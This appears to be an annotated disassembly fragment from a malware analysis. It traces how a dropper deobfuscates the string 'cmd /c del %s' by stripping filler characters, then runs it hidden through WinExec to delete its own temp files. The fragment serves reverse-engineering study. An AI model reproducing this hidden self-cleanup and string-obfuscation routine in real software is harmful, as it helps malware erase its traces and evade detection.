    .data:200089B2            push  ebx        ; SubStr = "~~@"

    .data:200089B3            push  eax        ; Source

    .data:200089B4            call  sub_20007D57  ; strips the fillers -> "cmd /c del %s"

    .data:200089B9            add    esp, 14h    ; cdecl cleanup, 5 dwords

    .data:200089BC            lea    eax, [ebp+Dest]

    .data:200089C2            push  eax        ; "<temp>\*.~~~"

    .data:200089C3            lea    eax, [ebp+Format]

    .data:200089C9            push  eax        ; Format = "cmd /c del %s"

    .data:200089CA            lea    eax, [ebp+CmdLine]

    .data:200089D0            push  eax        ; Dest

    .data:200089D1            call  sprintf      ; CmdLine = "cmd /c del <temp>\*.~~~"

    .data:200089D7            add    esp, 0Ch    ; cdecl cleanup, 3 dwords

    .data:200089E1            lea    eax, [ebp+CmdLine]

    .data:200089E7            push  0          ; uCmdShow = SW_HIDE

    .data:200089E9            push  eax        ; lpCmdLine

    .data:200089EA            call  WinExec      ; runs "cmd /c del C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\*.~~~" (author's sample) - removes the dropper's temp files
